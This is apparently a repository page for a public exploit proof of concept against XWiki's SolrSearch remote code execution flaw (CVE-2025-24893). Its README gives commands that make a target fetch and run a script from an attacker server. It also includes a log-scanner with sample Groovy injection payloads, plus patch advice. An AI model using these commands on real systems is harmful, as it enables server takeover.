PoC details: d105011ef6665a10ba557be6acc1ab0772c3277b

Source
Related vulnerability
Title: XWiki Platform security vulnerability (CVE-2025-24893)
Description: XWiki Platform is XWiki's open-source wiki platform for building collaborative web applications. XWiki Platform contains a security vulnerability: any guest user can achieve remote code execution through a request to SolrSearch.
Description
PoC for CVE-2025-24893
Introduction
# XWiki RCE Exploit PoC (CVE-2025-24893)

## Overview
This repository contains a Proof of Concept (PoC) exploit for the **XWiki Remote Code Execution (RCE)** vulnerability identified as [CVE-2025-24893](https://github.com/advisories/GHSA-rr6p-3pfg-562j). The vulnerability allows an attacker to execute arbitrary code on a target XWiki instance by leveraging a crafted request to the SolrSearch endpoint. This script supports both HTTP and HTTPS targets.

**⚠️ Disclaimer**: This PoC is intended for educational and research purposes only. Unauthorized use of this code against systems without explicit permission is illegal and unethical. Always obtain proper authorization before testing any system.

## Vulnerability Details
- **CVE ID**: CVE-2025-24893
- **Affected Component**: XWiki SolrSearch endpoint
- **Impact**: Remote Code Execution (RCE)
- **Advisory**: [GitHub Security Advisory](https://github.com/advisories/GHSA-rr6p-3pfg-562j)

The vulnerability arises due to improper handling of user input in the SolrSearch endpoint, allowing the injection of Groovy code via a crafted payload. This PoC demonstrates how an attacker can exploit this to execute arbitrary commands on the target server.

## Prerequisites
- Python 3.x
- Required Python libraries: `requests` (third-party, installed below); `argparse`, `urllib.parse`, `re` and `html` are part of the standard library and need no installation
- A target XWiki instance vulnerable to CVE-2025-24893
- An attacker-controlled server, reachable from the target over HTTP or HTTPS, hosting the shell script that will be fetched and executed on the target (e.g., `exploit.sh`)

## Installation
1. Clone this repository:
   ```bash
   git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
   ```
2. Install the required Python libraries:
   ```bash
   pip install requests
   ```

## Usage
The script sends a crafted HTTP/HTTPS request to the target XWiki instance, injecting a Groovy payload that executes a `curl` command to fetch and run a file from an attacker-controlled server.

Run the script with the following command:

```bash
python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]
```

### Arguments
- `--url`: The base URL of the target XWiki instance (e.g., `http://target` or `https://target`).
- `--server`: The IP or hostname of the attacker’s server, including the port if needed (e.g., `192.168.1.100:8080`). Supports both HTTP and HTTPS.
- `--file`: The name of the file on the attacker’s server containing the code to be executed (e.g., `exploit.sh`).
- `--no-verify`: Optional flag to disable TLS certificate verification for HTTPS targets (lab use only: it leaves the connection open to interception).

### Example 
```bash
python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh
```

To skip TLS certificate verification (e.g., for a target with a self-signed certificate):
```bash
python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify
```

This will:
1. Construct a payload that uses the Groovy script to execute a `curl` command.
2. Fetch the specified file (`exploit.sh`) from the attacker’s server (`http(s)://192.168.1.100:8080`).
3. Execute the fetched file on the target system.
4. Extract and display the output, cleaning up any HTML tags and entities.

## Output
The script extracts the response from the target, removes HTML tags (e.g., `<br/>`, `<del>`), and converts HTML entities to plain text for readability. The cleaned output is printed to the console.
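The cleaning step described above, written out as an added example (this is not the PoC's own `exploit.py` code, and the response fragment it works on is constructed for illustration). The order of operations is the point: tags are removed first and entities decoded second, because decoding first would turn an escaped `&lt;tmp&gt;` in the command output into `<tmp>` and the tag stripper would then delete it.

```python
"""Turn the HTML-flavoured command result embedded in a SolrSearch response
into plain text. Added example, not code from the PoC repository."""
import html
import re

# <br>, <br/> and <br /> become newlines so multi-line command output keeps its shape.
BR_RE = re.compile(r"<br\s*/?>", re.IGNORECASE)
# Any remaining tag (<del>, </del>, <p>, ...) is dropped entirely.
TAG_RE = re.compile(r"<[^>]+>")


def clean_output(fragment: str) -> str:
    """Strip markup, then decode entities, then drop empty lines."""
    text = BR_RE.sub("\n", fragment)
    text = TAG_RE.sub("", text)
    # Decode only after tags are gone: &lt;...&gt; must survive as literal text.
    text = html.unescape(text)
    lines = [ln.rstrip() for ln in text.splitlines()]
    return "\n".join(ln for ln in lines if ln).strip()


# Constructed fragment shaped like the markup the script strips (not a captured response).
SAMPLE_FRAGMENT = (
    "<del>uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)</del><br/>"
    "/opt/xwiki &amp; &lt;tmp&gt;<br />"
)

if __name__ == "__main__":
    print(clean_output(SAMPLE_FRAGMENT))
```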

## Sample
```bash
python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
```

## Limitations
- The target XWiki instance must be vulnerable to CVE-2025-24893.
- The attacker’s server must be accessible from the target system via HTTP or HTTPS.
- The script assumes the target server supports the SolrSearch endpoint and Groovy execution.

## Mitigation
To protect against this vulnerability:
- Update XWiki to a patched release. According to the advisory, the fix shipped in XWiki 15.10.11, 16.4.1 and 16.5.0RC1; later releases also contain it.
- Refer to the [GitHub Security Advisory](https://github.com/advisories/GHSA-rr6p-3pfg-562j) for detailed mitigation steps, including the workaround (editing the `Main.SolrSearchMacros` page) for installations that cannot upgrade immediately.
- Because the endpoint is reachable by unauthenticated guests, review access logs for requests to `SolrSearch` whose `text` parameter carries wiki scripting-macro syntax such as `{{groovy}}`.
- Background reading: [CVE-2025-24893](https://www.ionix.io/blog/xwiki-remote-code-execution-vulnerability-cve-2025-24893/)
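A defender-side counterpart to the PoC, added here as an example (it is not part of the repository): a small scanner that picks out SolrSearch requests whose `text` parameter contains XWiki scripting-macro markers. The access-log format assumed is the Apache/Tomcat combined style, the macro list (`groovy`, `async`, `velocity`) is an assumption you should tune to your own policy, and the log lines are constructed, not captured traffic. Percent-decoding is repeated so a double-encoded payload is not missed.

```python
"""Flag access-log requests to the XWiki SolrSearch endpoint whose `text`
parameter carries XWiki scripting-macro syntax. Added detection example;
the log lines are constructed, not real traffic."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/Tomcat "combined"-style access log; only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Macro names that should never appear inside a search string.
# Assumption for this example: extend the tuple to fit your deployment.
SCRIPT_MACROS = ("groovy", "async", "velocity")
MACRO_RE = re.compile(r"\{\{\s*(" + "|".join(SCRIPT_MACROS) + r")\b", re.IGNORECASE)


def fully_unquote(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line: str):
    """Return None for lines that are not SolrSearch requests; otherwise a dict
    with client IP, status, the decoded `text` parameter and the macros found."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/SolrSearch"):
        return None
    # parse_qs performs one round of percent-decoding itself.
    params = parse_qs(parts.query, keep_blank_values=True)
    text = fully_unquote(" ".join(params.get("text", [])))
    macros = sorted({name.lower() for name in MACRO_RE.findall(text)})
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "text": text,
        "macros": macros,
        "suspicious": bool(macros),
    }


def scan(lines):
    """Yield only the suspicious SolrSearch requests from an iterable of log lines."""
    for line in lines:
        verdict = classify(line)
        if verdict and verdict["suspicious"]:
            yield verdict


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2025:10:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=meeting+notes HTTP/1.1" 200 812',
    '10.0.0.9 - - [01/Mar/2025:10:00:02 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 4411',
    '203.0.113.7 - - [01/Mar/2025:10:00:03 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(1)%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D HTTP/1.1" 200 1290',
    '203.0.113.7 - - [01/Mar/2025:10:00:04 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%257B%257Bgroovy%257D%257Dprintln(2)%257B%257B/groovy%257D%257D HTTP/1.1" 200 1290',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ip']} status={hit['status']} macros={hit['macros']} text={hit['text']!r}")
```

Feed it `sys.stdin` or the lines of an access-log file instead of `SAMPLE_LOG` to run it over real data; a 200 status on a flagged request means the server rendered the injected content and the host should be treated as compromised until proven otherwise.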

## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
File snapshot

```
[4.0K] /data/pocs/d105011ef6665a10ba557be6acc1ab0772c3277b
├── [1.8K] exploit.py
├── [   2] exploit.sh
├── [1.0K] LICENSE
└── [4.2K] README.md

0 directories, 4 files
```